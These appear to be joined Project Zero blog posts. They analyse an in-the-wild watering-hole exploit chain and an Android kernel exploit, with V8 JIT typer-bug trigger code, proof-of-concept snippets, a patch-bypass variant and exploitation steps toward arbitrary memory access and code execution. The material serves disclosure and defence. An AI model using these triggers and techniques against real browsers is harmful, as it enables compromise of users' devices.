For simplicity, I had the eBPF implement a busy-poll of the shared memory to execute commands on behalf of the userspace process. The eBPF program would repeatedly read a value from the ION buffer and perform either a 64-bit read, 64-bit write, or 5-argument function call based on the value that was read. This gives us an incredibly simple and reliable kernel read/write/execute primitive.

Even though the primitive was hacky and the system was not yet stable, I decided to stop developing the exploit at this point because my read/write/execute primitive was sufficiently powerful that subsequent exploitation steps would be fully independent of the original bug. I felt that I had achieved the goal of exploring the differences between kernel exploitation on Android and iOS.

Conclusion

So, what are my takeaways from developing this Android exploit?

Overall, the quality of the hardware mitigations on the Samsung Galaxy S10 was much stronger than I had expected. My uninformed expectation about the state of hardware mitigation adoption on Android devices was that it lagged significantly behind iOS. And in broad strokes that's true: the iPhone XS's A12 SOC supports ARMv8.3-A compared to the Qualcomm Snapdragon 855's ARMv8.2-A, and the A12 includes a few Apple-custom mitigations (KTRR, APRR+PPL) not present in the Snapdragon SOC. However, the mitigation gap was substantially smaller than I had been expecting, and there were even a few ways that the Galaxy S10 supported stronger mitigations than the iPhone XS, for instance by using unprivileged load/store operations during copy_from/to_user(). And as interesting as Apple's custom mitigations are on iOS, they would not have blocked this exploit from obtaining kernel read/write.

In terms of the software, I had expected Android to provide significantly weaker and more limited kernel manipulation primitives (heap shaping, target objects to corrupt, etc) than what's provided by the Mach microkernel portion of XNU, and this also seems largely true. I suspect that part of the reason that public iOS exploits all seem to follow very similar exploit flows is that the pre- and post-exploitation primitives available to manipulate the kernel are exceptionally powerful and flexible. Having powerful manipulation primitives allows you to obtain powerful exploitation primitives more quickly, with less of the exploit flow specific to the exact constraints of the bug. In the case of this Android exploit, it's hard for me to speak generally given my lack of familiarity with the platform. I did manage to find good heap manipulation primitives, so the heap shaping part of the exploit was straightforward and generic. On the other hand, I struggled to find stack frames amenable to manipulation, which forced me to dig through lots of technical constraints to find strategies that would just barely work. As a result, the exploit flow to get kernel read/write/execute is highly specific to the underlying vulnerability until the last step. I'm thus left feeling that there are almost certainly much more elegant ways to exploit the NPU bugs than the strategy I chose.

Despite all these differences between the two platforms, I was overall quite surprised with the similarities and parallels that did emerge. Even though the final exploit flow for this NPU bug ended up being quite different, there were many echoes of the oob_timestamp exploit along the way. Thus my past experience developing iOS kernel exploits did in fact help me come up with ideas worth trying on Android, even if most of those ideas didn't pan out.

Introducing the In-the-Wild Series

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, head to the bottom of this post.

At Project Zero we often refer to our goal simply as “make 0-day hard”. Members of the team approach this challenge mainly through the lens of offensive security research. And while we experiment a lot with new targets and methodologies in order to remain at the forefront of the field, it is important that the team doesn’t stray too far from the current state of the art. One of our efforts in this regard is the tracking of publicly known cases of zero-day vulnerabilities. We use this information to guide the research. Unfortunately, public 0-day reports rarely include captured exploits, which could provide invaluable insight into exploitation techniques and design decisions made by real-world attackers. In addition, we believe there to be a gap in the security community’s ability to detect 0-day exploits.

Therefore, Project Zero has recently launched our own initiative aimed at researching new ways to detect 0-day exploits in the wild. Through partnering with the Google Threat Analysis Group (TAG), one of the first results of this initiative was the discovery of a watering hole attack in Q1 2020 performed by a highly sophisticated actor.

We discovered two exploit servers delivering different exploit chains via watering hole attacks. One server targeted Windows users, the other targeted Android. Both the Windows and the Android servers used Chrome exploits for the initial remote code execution. The exploits for Chrome and Windows included 0-days. For Android, the exploit chains used publicly known n-day exploits. Based on the actor's sophistication, we think it's likely that they had access to Android 0-days, but we didn't discover any in our analysis.

Flowchart showing the exploit chain from affected websites, to exploit servers, to Chrome renderers, to Android or Windows privesc, and finally implants.

From the exploit servers, we have extracted:

  • Renderer exploits for four bugs in Chrome, one of which was still a 0-day at the time of the discovery.
  • Two sandbox escape exploits abusing three 0-day vulnerabilities in Windows.
  • A “privilege escalation kit” composed of publicly known n-day exploits for older versions of Android.

The four 0-days discovered in these chains have been fixed by the appropriate vendors:

  • CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)
  • CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
  • CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)

We understand this attacker to be operating a complex targeting infrastructure, though it didn't seem to be used every time. In some cases, the attackers used an initial renderer exploit to develop detailed fingerprints of the users from inside the sandbox. In these cases, the attacker took a slower approach: sending back dozens of parameters from the end users device, before deciding whether or not to continue with further exploitation and use a sandbox escape. In other cases, the attacker would choose to fully exploit a system straight away (or not attempt any exploitation at all). In the time we had available before the servers were taken down, we were unable to determine what parameters determined the "fast" or "slow" exploitation paths.

The Project Zero team came together and spent many months analyzing in detail each part of the collected chains. What did we learn? These exploit chains are designed for efficiency & flexibility through their modularity. They are well-engineered, complex code with a variety of novel exploitation methods, mature logging, sophisticated and calculated post-exploitation techniques, and high volumes of anti-analysis and targeting checks. We believe that teams of experts have designed and developed these exploit chains. We hope this blog post series provides others with an in-depth look at exploitation from a real world, mature, and presumably well-resourced actor.

The posts in this series share the technical details of different portions of the exploit chain, largely focused on what our team found most interesting. We include:

  • Detailed analysis of the vulnerabilities being exploited and each of the different exploit techniques,
  • A deep look into the bug class of one of the Chrome exploits, and
  • An in-depth teardown of the Android post-exploitation code.

In addition, we are posting root cause analyses for each of the four 0-days discovered as a part of these exploit chains.

Exploitation aside, the modularity of payloads, interchangeable exploitation chains, logging, targeting and maturity of this actor's operation set these apart. We hope that by sharing this information publicly, we are continuing to close the knowledge gap between private exploitation (what well resourced exploitation teams are doing in the real world) and what is publicly known.

We recommend reading the posts in the following order:

  1. Introduction (this post)
  2. Chrome: Infinity Bug
  3. Chrome Exploits
  4. Android Exploits
  5. Android Post-Exploitation
  6. Windows Exploits

This is part 1 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 2: Chrome Infinity Bug.

In-the-Wild Series: Chrome Infinity Bug

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

This post only covers one of the exploits, specifically a renderer exploit targeting Chrome 73-78 on Android. We use it as an opportunity to talk about an interesting vulnerability class in Chrome’s JavaScript engine.

Brief introduction to typer bugs

One of the features that make JavaScript code especially difficult to optimize is the dynamic type system. Even for a trivial expression like a + b the engine has to support a multitude of cases depending on whether the parameters are numbers, strings, booleans, objects, etc. JIT compilation wouldn’t make much sense if the compiler always had to emit machine code that could handle every possible type combination for every JS operation. Chrome’s JavaScript engine, V8, tries to overcome this limitation through type speculation. During the first several invocations of a JavaScript function, the interpreter records the type information for various operations such as parameter accesses and property loads. If the function is later selected to be JIT compiled, TurboFan, which is V8’s newest compiler, makes an assumption that the observed types will be used in all subsequent calls, and propagates the type information throughout the whole function graph using the set of rules derived from the language specification. For example: if at least one of the operands to the addition operator is a string, the output is guaranteed to be a string as well; Math.random() always returns a number; and so on. The compiler also puts runtime checks for the speculated types that trigger deoptimization (i.e., revert to execution in the interpreter and update the type feedback) in case one of the assumptions no longer holds.

For integers, V8 goes even further and tracks the possible range of nodes. The main reason behind that is that even though the ECMAScript specification defines Number as the 64-bit floating point type, internally, TurboFan always tries to use the most efficient representation possible in a given context, which could be a 64-bit integer, 31-bit tagged integer, etc. Range information is also employed in other optimizations. For example, the compiler is smart enough to figure out that in the following code snippet, the branch can never be taken and therefore eliminate the whole if statement:

a = Math.min(a, 1);

if (a > 2) {

  return 3;

}

Now, imagine there’s an issue that makes TurboFan believe that the function vuln() returns a value in the range [0; 2] whereas its actual range is [0; 4]. Consider the code below:

a = vuln(a);

let array = [1, 2, 3];

return array[a];

If the engine has never encountered an out-of-bounds access attempt while running the code in the interpreter, it will instruct the compiler to transform the last line into a sequence that at a certain optimization phase, can be expressed by the following pseudocode:

if (a >= array.length) {

  deoptimize();

}

let elements = array.[[elements]];

return elements.get(a);

get() acts as a C-style element access operation and performs no bounds checks. In subsequent optimization phases the compiler will discover that, according to the available type information, the length check is redundant and eliminate it completely. Consequently, the generated code will be able to access out-of-bounds data.

The bug class outlined above is the main subject of this blog post; and bounds check elimination is the most popular exploitation technique for this class. A textbook example of such a vulnerability is the off-by-one issue in the typer rule for String.indexOf found by Stephen Röttger.

A typer vulnerability doesn’t have to immediately result in an integer range miscalculation that would lead to OOB access because it’s possible to make the compiler propagate the error. For example, if vuln() returns an unexpected boolean value, we can easily transform it into an unexpected integer:

a = vuln(a); // predicted = false; actual = true

a = a * 10;  // predicted = 0; actual = 10

let array = [1, 2, 3];

return array[a];

Another notable bug report by Stephen demonstrates that even a subtle mistake such as omitting negative zero can be exploited in the same fashion.

At a certain point, this vulnerability class became extremely popular as it immediately provided an attacker with an enormously powerful and reliable exploitation primitive. Fellow Project Zero member Mark Brand has used it in his full-chain Chrome exploit. The bug class has made an appearance at several CTFs and exploit competitions. As a result, last year the V8 team issued a hardening patch designed to prevent attackers from abusing bounds check elimination. Instead of removing the checks, the compiler started marking them as “aborting”, so in the worst case the attacker can only trigger a SIGTRAP.

Induction variable analysis

The renderer exploit we’ve discovered takes advantage of an issue in a function designed to compute the type of induction variables. The slightly abridged source code below is taken from the latest affected revision of V8:

Type Typer::Visitor::TypeInductionVariablePhi(Node* node) {

  [...]

  // We only handle integer induction variables (otherwise ranges

  // do not apply and we cannot do anything).

  if (!initial_type.Is(typer_->cache_->kInteger) ||

      !increment_type.Is(typer_->cache_->kInteger)) {

    // Fallback to normal phi typing, but ensure monotonicity.

    // (Unfortunately, without baking in the previous type,

    // monotonicity might be violated because we might not yet have

    // retyped the incrementing operation even though the increment's

    // type might been already reflected in the induction variable

    // phi.)

    Type type = NodeProperties::IsTyped(node)

                    ? NodeProperties::GetType(node)

                    : Type::None();

    for (int i = 0; i < arity; ++i) {

      type = Type::Union(type, Operand(node, i), zone());

    }

    return type;

  }

  // If we do not have enough type information for the initial value

  // or the increment, just return the initial value's type.

  if (initial_type.IsNone() ||

      increment_type.Is(typer_->cache_->kSingletonZero)) {

    return initial_type;

  }

  [...]

  InductionVariable::ArithmeticType arithmetic_type =

      induction_var->Type();

  double min = -V8_INFINITY;

  double max = V8_INFINITY;

  double increment_min;

  double increment_max;

  if (arithmetic_type ==

      InductionVariable::ArithmeticType::kAddition) {

    increment_min = increment_type.Min();

    increment_max = increment_type.Max();

  } else {

    DCHECK_EQ(InductionVariable::ArithmeticType::kSubtraction,

              arithmetic_type);

    increment_min = -increment_type.Max();

    increment_max = -increment_type.Min();

  }

  if (increment_min >= 0) {

    // increasing sequence

    min = initial_type.Min();

    for (auto bound : induction_var->upper_bounds()) {

      Type bound_type = TypeOrNone(bound.bound);

      // If the type is not an integer, just skip the bound.

      if (!bound_type.Is(typer_->cache_->kInteger)) continue;

      // If the type is not inhabited, then we can take the initial

      // value.

      if (bound_type.IsNone()) {

        max = initial_type.Max();

        break;

      }

      double bound_max = bound_type.Max();

      if (bound.kind == InductionVariable::kStrict) {

        bound_max -= 1;

      }

      max = std::min(max, bound_max + increment_max);

    }

    // The upper bound must be at least the initial value's upper

    // bound.

    max = std::max(max, initial_type.Max());

  } else if (increment_max <= 0) {

    // decreasing sequence

    [...]

  } else {

    // Shortcut: If the increment can be both positive and negative,

    // the variable can go arbitrarily far, so just return integer.

    return typer_->cache_->kInteger;

  }

  [...]

  return Type::Range(min, max, typer_->zone());

}

Now, imagine the compiler processing the following JavaScript code:

for (var i = initial; i < bound; i += increment) { [...] }

In short, when the loop has been identified as increasing, the lower bound of initial becomes the lower bound of i, and the upper bound is calculated as the sum of the upper bounds of bound and increment. There’s a similar branch for decreasing loops, and a special case for variables that can be both increasing and decreasing. The loop variable is named phi in the method because TurboFan operates on an intermediate representation in the static single assignment form.

Note that the algorithm only works with integers, otherwise a more conservative estimation method is applied. However, in this context an integer refers to a rather special type, which isn’t bound to any machine integer type and can be represented as a floating point value in memory. The type holds two unusual properties that have made the vulnerability possible:

  • +Infinity and -Infinity belong to it, whereas NaN and -0 don’t.
  • The type is not closed under addition, i.e., adding two integers doesn’t always result in an integer. Namely, +Infinity + -Infinity yields NaN.

Thus, for the following loop the algorithm infers (-Infinity; +Infinity) as the induction variable type, while the actual value after the first iteration of the loop will be NaN:

for (var i = -Infinity; i < 0; i += Infinity) { }

This one line is enough to trigger the issue. The exploit author has had to make only two minor changes: (1) parametrize increment in order to make the value of i match the future inferred type during initial invocations in the interpreter and (2) introduce an extra variable to ensure the loop eventually ends. As a result, after deobfuscation, the relevant part of the trigger function looks as follows:

function trigger(argument) {

  var j = 0;

  var increment = 100;

  if (argument > 2) {

    increment = Infinity;

  }

  for (var i = -Infinity; i <= -Infinity; i += increment) {

    j++;

    if (j == 20) {

      break;

    }

  }

[...]

The resulting type mismatch, however, doesn’t immediately let the attacker run arbitrary code. Given that the previously widely used bounds check elimination technique is no longer applicable, we were particularly interested to learn how the attacker approached exploiting the issue.

Exploitation

The trigger function continues with a series of operations aimed at transforming the type mismatch into an integer range miscalculation, similarly to what would follow in the previous technique, but with the additional requirement that the computed range must be narrowed down to a single number. Since the discovered exploit targets mobile devices, the exact instruction sequence used in the exploit only works for ARM processors. For the ease of the reader, we've modified it to be compatible with x64 as well.

[...]

  // The comments display the current value of the variable i, the type

  // inferred by the compiler, and the machine type used to store

  // the value at each step.

  // Initially:

  // actual = NaN, inferred = (-Infinity, +Infinity)

  // representation = double

  i = Math.max(i, 0x100000800);

  // After step one:

  // actual = NaN, inferred = [0x100000800; +Infinity)

  // representation = double

  i = Math.min(0x100000801, i);

  // After step two:

  // actual = -0x8000000000000000, inferred = [0x100000800, 0x100000801]

  // representation = int64_t

  i -= 0x1000007fa;

  // After step three:

  // actual = -2042, inferred = [6, 7]

  // representation = int32_t

  i >>= 1;

  // After step four:

  // actual = -1021, inferred = 3

  // representation = int32_t

  i += 10;

  // After step five:

  // actual = -1011, inferred = 13

  // representation = int32_t

[...]

The first notable transformation occurs in step two. TurboFan decides that the most appropriate representation for i at this point is a 64-bit integer as the inferred range is entirely within int64_t, and emits the CVTTSD2SI instruction to convert the double argument. Since NaN doesn’t fit in the integer range, the instruction returns the “indefinite integer value” -0x8000000000000000. In the next step, the compiler determines it can use the even narrower int32_t type. It discards the higher 32-bit word of i, assuming that for the values in the given range it has the same effect as subtracting 0x100000000, and then further subtracts 0x7fa. The remaining two operations are straightforward; however, one might wonder why the attacker couldn’t make the compiler derive the required single-value type directly in step two. The answer lies in the optimization pass called the constant-folding reducer.

Reduction ConstantFoldingReducer::Reduce(Node* node) {

  DisallowHeapAccess no_heap_access;

  if (!NodeProperties::IsConstant(node) && NodeProperties::IsTyped(node) &&

      node->op()->HasProperty(Operator::kEliminatable) &&

      node->opcode() != IrOpcode::kFinishRegion) {

    Node* constant = TryGetConstant(jsgraph(), node);

    if (constant != nullptr) {

      ReplaceWithValue(node, constant);

      return Replace(constant);

[...]

If the reducer discovered that the output type of the NumberMin operator was a constant, it would replace the node with a reference to the constant thus eliminating the type mismatch. That doesn’t apply to the SpeculativeNumberShiftRight and SpeculativeSafeIntegerAdd nodes, which represent the operations in steps four and five while the reducer is running, because they both are capable of triggering deoptimization and therefore not marked as eliminable.

Formerly, the next step would be to abuse this mismatch to optimize away an array bounds check. Instead, the attacker makes use of the incorrectly typed value to create a JavaScript array for which bounds checks always pass even outside the compiled function. Consider the following method, which attempts to optimize array constructor calls:

Reduction JSCreateLowering::ReduceJSCreateArray(Node* node) {

[...]

} else if (arity == 1) {

  Node* length = NodeProperties::GetValueInput(node, 2);

  Type length_type = NodeProperties::GetType(length);

  if (!length_type.Maybe(Type::Number())) {

    // Handle the single argument case, where we know that the value

    // cannot be a valid Array length.

    elements_kind = GetMoreGeneralElementsKind(

        elements_kind, IsHoleyElementsKind(elements_kind)

                           ? HOLEY_ELEMENTS

                           : PACKED_ELEMENTS);

    return ReduceNewArray(node, std::vector<Node*>{length}, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

  }

  if (length_type.Is(Type::SignedSmall()) && length_type.Min() >= 0 &&

      length_type.Max() <= kElementLoopUnrollLimit &&

      length_type.Min() == length_type.Max()) {

    int capacity = static_cast<int>(length_type.Max());

    return ReduceNewArray(node, length, capacity, *initial_map,

                          elements_kind, allocation,

                          slack_tracking_prediction);

[...]

When the argument is known to be an integer constant less than 16, the compiler inlines the array creation procedure and unrolls the element initialization loop. ReduceJSCreateArray doesn’t rely on the constant-folding reducer and implements its own less strict equivalent that just compares the upper and lower bounds of the inferred type. Unfortunately, even after folding the function keeps using the original argument node. The folded value is employed during initialization of the backing store while the length property of the array is set to the original node. This means that if we pass the value we obtained at step five to the constructor, it will return an array with the negative length and backing store that can fit 13 elements. Given that bounds checks are implemented as unsigned comparisons, the сrafted array will allow us to access data well past its end. In fact, any positive value bigger than its predicted version would work as well.

The rest of the trigger function is provided below:

[...]

  corrupted_array = Array(i);

  corrupted_array[0] = 1.1;

  ptr_leak_array = [wasm_module, array_buffer, [...],

                    wasm_module, array_buffer]; 

  extra_array = [13.37, [...], 13.37, 1.234]; 

  return [corrupted_array, ptr_leak_array, extra_array];

}

The attacker forces TurboFan to put the data required for further exploitation right next to the corrupted array and to use the double element type for the backing store as it’s the most convenient type for dealing with out-of-bounds data in the V8 heap.

From this point on, the exploit follows the same algorithm that public V8 exploits have been following for several years:

  1. Locate the required pointers and object fields through pattern-matching.
  2. Construct an arbitrary memory access primitive using an extra JavaScript array and ArrayBuffer.
  3. Follow the pointer chain from a WebAssembly module instance to locate a writable and executable memory page.
  4. Overwrite the body of a WebAssembly function inside the page with the attacker’s payload.
  5. Finally, execute it.

The contents of the payload, which is about half a megabyte in size, will be discussed in detail in a subsequent blog post.

Given that the vast majority of Chrome exploits we have seen at Project Zero come from either exploit competitions or VRP submissions, the most striking difference this exploit has demonstrated lies in its focus on stability and reliability. Here are some examples. Almost the entire exploit is executed inside a web worker, which means it has a separate JavaScript environment and runs in its own thread. This greatly reduces the chance of the garbage collector causing an accidental crash due to the inconsistent heap state. The main thread part is only responsible for restarting the worker in case of failure and passing status information to the attacker’s server. The exploit attempts to further reduce the time window for GC crashes by ensuring that every corrupted field is restored to the original value as soon as possible. It also employs the OOB access primitive early on to verify the processor architecture information provided in the user agent header. Finally, the author has clearly aimed to keep the number of hard-coded constants to a minimum. Despite supporting a wide range of Chrome versions, the exploit relies on a single version-dependent offset, namely, the offset in the WASM instance to the executable page pointer.

Patch 1

Even though there’s evidence this vulnerability has been originally used as a 0-day, by the time we obtained the exploit, it had already been fixed. The issue was reported to Chrome by security researchers Soyeon Park and Wen Xu in November 2019 and was assigned CVE-2019-13764. The proof of concept provided in the report is shown below:

function write(begin, end, step) {

  for (var i = begin; i >= end; i += step) {

    step = end - begin;

    begin >>>= 805306382;

  }

}

var buffer = new ArrayBuffer(16384);

var view = new Uint32Array(buffer);

for (let i = 0; i < 10000; i++) {

  write(Infinity, 1, view[65536], 1);

}

As the reader can see, it’s not the most straightforward way to trigger the issue. The code resembles fuzzer output, and the reporters confirmed that the bug had been found through fuzzing. Given the available evidence, we’re fully confident that it was an independent discovery (sometimes referred to as a "bug collision").

Since the proof of concept could only lead to a SIGTRAP crash, and the reporters hadn’t demonstrated, for example, a way to trigger memory corruption, it was initially considered a low-severity issue by the V8 engineers, however, after an internal discussion, the V8 team raised the severity rating to high.

In the light of the in-the-wild exploitation evidence, we decided to give the fix, which had introduced an explicit check for the NaN case, a thorough examination:

[...]

const bool both_types_integer =

    initial_type.Is(typer_->cache_->kInteger) &&

    increment_type.Is(typer_->cache_->kInteger);

bool maybe_nan = false;

// The addition or subtraction could still produce a NaN, if the integer

// ranges touch infinity.

if (both_types_integer) {

  Type resultant_type =

      (arithmetic_type == InductionVariable::ArithmeticType::kAddition)

          ? typer_->operation_typer()->NumberAdd(initial_type,

                                                 increment_type)

          : typer_->operation_typer()->NumberSubtract(initial_type,

                                                      increment_type);

  maybe_nan = resultant_type.Maybe(Type::NaN());

}

// We only handle integer induction variables (otherwise ranges

// do not apply and we cannot do anything).

if (!both_types_integer || maybe_nan) {

[...]

The code makes the assumption that the loop variable may only become NaN if the sum or difference of initial and increment is NaN. At first sight, it seems like a fair assumption. The issue arises from the fact that the value of increment can be changed from inside the loop, which isn’t obvious from the exploit but demonstrated in the proof of concept sent to Chrome. The typer takes into account these changes and reflects them in increment’s computed type. Therefore, the attacker can, for example, add negative increment to i until the latter becomes -Infinity, then change the sign of increment and force the loop to produce NaN once more, as demonstrated by the code below:

var increment = -Infinity;

var k = 0;

for (var i = 0; i < 1; i += increment) {

  if (i == -Infinity) {

    increment = +Infinity;

  }

  if (++k > 10) {

    break;

  }

}

Thus, to “revive” the entire exploit, the attacker only needs to change a couple of lines in trigger.

Patch 2

The discovered variant was reported to Chrome in February along with the exploitation technique found in the exploit. This time the patch took a more conservative approach and made the function bail out as soon as the typer detects that increment can be Infinity.

[...]

// If we do not have enough type information for the initial value or

// the increment, just return the initial value's type.

if (initial_type.IsNone() ||

    increment_type.Is(typer_->cache_->kSingletonZero)) {

  return initial_type;

}

// We only handle integer induction variables (otherwise ranges do not

// apply and we cannot do anything). Moreover, we don't support infinities

// in {increment_type} because the induction variable can become NaN

// through addition/subtraction of opposing infinities.

if (!initial_type.Is(typer_->cache_->kInteger) ||

    !increment_type.Is(typer_->cache_->kInteger) ||

    increment_type.Min() == -V8_INFINITY ||

    increment_type.Max() == +V8_INFINITY) {

[...]

Additionally, ReduceJSCreateArray was updated to always use the same value for both the  length property and backing store capacity, thus rendering the reported exploitation technique useless.

Unfortunately, the new patch contained an unintended change that introduced another security issue. If we look at the source code of TypeInductionVariablePhi before the patches, we find that it checks whether the type of increment is limited to the constant zero. In this case, it assigns the type of initial to the induction variable. The second patch moved the check above the line that ensures initial is an integer. In JavaScript, however, adding or subtracting zero doesn’t necessarily preserve the type, for example:

-0

+

0

=>

-0

[string]

-

0

=>

[number]

[object]

+

0

=>

[string]

As a result, the patched function provides us with an even wider choice of possible “type confusions”.

It was considered worthwhile to examine how difficult it would be to find a replacement for the ReduceJSCreateArray technique and exploit the new issue. The task turned out to be a lot easier than initially expected because we soon found this excellent blog post written by Jeremy Fetiveau, where he describes a way to bypass the initial bounds check elimination hardening. In short, depending on whether the engine has encountered an out-of-bounds element access attempt during the execution of a function in the interpreter, it instructs the compiler to emit either the CheckBounds or NumberLessThan node, and only the former is covered by the hardening. Consequently, the attacker just needs to make sure that the function attempts to access a non-existent array element in one of the first few invocations.

We find it interesting that even though this equally powerful and convenient technique has been publicly available since last May, the attacker has chosen to rely on their own method. It is conceivable that the exploit had been developed even before the blog post came out.

Once again, the technique requires an integer with a miscalculated range, so the revamped trigger function mostly consists of various type transformations:

function trigger(arg) {

  // Initially:

  // actual = 1, inferred = any

  var k = 0;

 

  arg = arg | 0;

  // After step one:

  // actual = 1, inferred = [-0x80000000, 0x7fffffff]

 

  arg = Math.min(arg, 2);

  // After step two:

  // actual = 1, inferred = [-0x80000000, 2]

 

  arg = Math.max(arg, 1);

  // After step three:

  // actual = 1, inferred = [1, 2]

 

  if (arg == 1) {

    arg = "30";

  }

  // After step four:

  // actual = string{30}, inferred = [1, 2] or string{30}

 

  for (var i = arg; i < 0x1000; i -= 0) {

    if (++k > 1) {

      break;

    }

  }

  // After step five:

  // actual = number{30}, inferred = [1, 2] or string{30}

 

  i += 1;

  // After step six:

  // actual = 31, inferred = [2, 3]

 

  i >>= 1;

  // After step seven:

  // actual = 15, inferred = 1

 

  i += 2;

  // After step eight:

  // actual = 17, inferred = 3

 

  i >>= 1;

  // After step nine:

  // actual = 8, inferred = 1

  var array = [0.1, 0.1, 0.1, 0.1];

  return [array[i], array];

}

The mismatch between the number 30 and string “30” occurs in step five. The next operation is represented by the SpeculativeSafeIntegerAdd node. The typer is aware that whenever this node encounters a non-number argument, it immediately triggers deoptimization. Hence, all non-number elements of the argument type can be ignored. The unexpected integer value, which obviously doesn’t cause the deoptimization, enables us to generate an erroneous range. Eventually, the compiler eliminates the NumberLessThan node, which is supposed to protect the element access in the last line, based on the observed range.

Patch 3

Soon after we had identified the regression, the V8 team landed a patch that removed the vulnerable code branch. They also took a number of additional hardening measures, for example:

  • Extended element access hardening, which now prevents the abuse of NumberLessThan nodes.
  • Discovered and fixed a similar problem with the elimination of MaybeGrowFastElements. Under certain conditions, this node, which may resize the backing store of a given array, is placed before StoreElement to ensure the array can fit the element. Consequently, the elimination of the node could allow an attacker to write data past the end of the backing store.
  • Implemented a verifier for induction variables that validates the computed type against the more conservative regular phi typing.

Furthermore, the V8 engineers have been working on a feature that allows TurboFan to insert runtime type checks into generated code. The feature should make fuzzing for typer issues much more efficient.

Conclusion

This blog post is meant to provide insight into the complexity of type tracking in JavaScript. The number of obscure rules and constraints an engineer has to bear in mind while working on the feature almost inevitably leads to errors, and, quite often even the slightest issue in the typer is enough to build a powerful and reliable exploit.

Also, the reader is probably familiar with the hypothesis of an enormous disparity between the state of public and private offensive security research. The fact that we’ve discovered a rather sophisticated attacker who has exploited a vulnerability in the class that has been under the scrutiny of the wider security community for at least a couple of years suggests that there’s nevertheless a certain overlap. Moreover, we were especially pleased to see a bug collision between a VRP submission and an in-the-wild 0-day exploit.

This is part 2 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 3: Chrome Exploits.

In-the-Wild Series: Chrome Exploits

This is part 3 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Sergei Glazunov, Project Zero

Introduction

As we continue the series on the watering hole attack discovered in early 2020, in this post we’ll look at the rest of the exploits used by the actor against Chrome. A timeline chart depicting the extracted exploits and affected browser versions is provided below. Different color shades represent different exploit versions.

A timeline chart depicting the extracted exploits and affected browser versions.

All vulnerabilities used by the attacker are in V8, Chrome’s JavaScript engine; and more specifically, they are JIT compiler bugs. While classic C++ memory safety issues are still exploited in real-world attacks against web browsers, vulnerabilities in JIT offer many advantages to attackers. First, they usually provide more powerful primitives that can be easily turned into a reliable exploit without the need of a separate issue to, for example, break ASLR. Secondly, the majority of them are almost interchangeable, which significantly accelerates exploit development. Finally, bugs from this class allow the attacker to take advantage of a browser feature called web workers. Web developers use workers to execute additional tasks in a separate JavaScript environment. The fact that every worker runs in its own thread and has its own V8 heap makes exploitation significantly more predictable and stable.

The bugs themselves aren’t novel. In fact, three out of four issues have been independently discovered by external security researchers and reported to Chrome, and two of the reports even provided a full renderer exploit. While writing this post, we were more interested in learning about exploitation techniques and getting insight into a high-tier attacker’s exploit development process.

1. CVE-2017-5070

The vulnerability

This is an issue in Crankshaft, the JIT engine Chrome used before TurboFan. The alias analyzer, which is used by several optimization passes to determine whether two nodes may refer to the same object, produces incorrect results when one of the two nodes is a constant. Consider the following code, which has been extracted from one of the exploits:

global_array = [, 1.1];

 

function trigger(local_array) {

  var temp = global_array[0];

  local_array[1] = {};

  return global_array[1];

}

 

trigger([, {}]);

trigger([, 1.1]);

 

for (var i = 0; i < 10000; i++) {

  trigger([, {}]);

}

 

print(trigger(global_array));

The first line of the trigger function makes Crankshaft perform a map check on global_array (a map in V8 describes the “shape” of an object and includes the element representation information). The next line may trigger the double -> tagged element representation transition for local_array. Since the compiler incorrectly assumes that local_array and global_array can’t point to the same object, it doesn’t invalidate the recorded map state of global_array and, consequently, eliminates the “redundant” map check in the last line of the function.

The vulnerability grants an attacker a two-way type confusion between a JS object pointer and an unboxed double, which is a powerful primitive and is sufficient for a reliable exploit.

The issue was reported to Chrome by security researcher Qixun Zhao (@S0rryMybad) in May 2017 and fixed in the initial release of Chrome 59. The researcher also provided a renderer exploit. The fix made made the alias analyser use the constant comparison only when both arguments are constants:

 HAliasing Query(HValue* a, HValue* b) {

  [...]

     // Constant objects can be distinguished statically.

-    if (a->IsConstant()) {

+    if (a->IsConstant() && b->IsConstant()) {

       return a->Equals(b) ? kMustAlias : kNoAlias;

     }

     return kMayAlias;

Exploit 1

The earliest exploit we’ve discovered targets Chrome 37-58. This is the widest version range we’ve seen, which covers the period of almost three years. Unlike the rest of the exploits, this one contains a separate constant table for every supported browser build.

The author of the exploit takes a known approach to exploiting type confusions in JavaScript engines, which involves gaining the arbitrary read/write capability as an intermediate step. The exploit employs the issue to implement the addrof and fakeobj primitives. It “constructs” a fake ArrayBuffer object inside a JavaScript string, and uses the above primitives to obtain a reference to the fake object. Because strings in JS are immutable, the backing store pointer field of the fake ArrayBuffer can’t be modified. Instead, it’s set in advance to point to an extra ArrayBuffer, which is actually used for arbitrary memory access. Finally, the exploit follows a pointer chain to locate and overwrite the code of a JIT compiled function, which is stored in a RWX memory region.

The exploit is quite an impressive piece of engineering. For example, it includes a small framework for crafting fake JS objects, which supports assigning fields to real JS objects, fake sub-objects, tagged integers, etc. Since the bug can only be triggered once per JIT-compiled function, every time addrof or fakeobj is called, the exploit dynamically generates a new set of required objects and functions using eval.

The author also made significant efforts to increase the reliability of the exploit: there is a sanity check at every minor step; addrof stores all leaked pointers, and the exploit ensures they are still valid before accessing the fake object; fakeobj creates a giant string to store the crafted object contents so it gets allocated in the large object space, where objects aren’t moved by the garbage collector. And, of course, the exploit runs inside a web worker.

However, despite the efforts, the amount of auxiliary code and complexity of the design make accidental crashes quite probable. Also, the constructed fake buffer object is only well-formed enough to be accepted as an argument to the typed array constructor, but it’s unlikely to survive a GC cycle. Reliability issues are the likely reason for the existence of the second exploit.

Exploit 2

The second exploit for the same vulnerability aims at Chrome 47-58, i.e. a subrange of the previous exploit’s supported version range, and the exploit server always gives preference to the second exploit. The version detection is less strict, and there are just three distinct constant tables: for Chrome 47-49, 50-53 and 54-58.

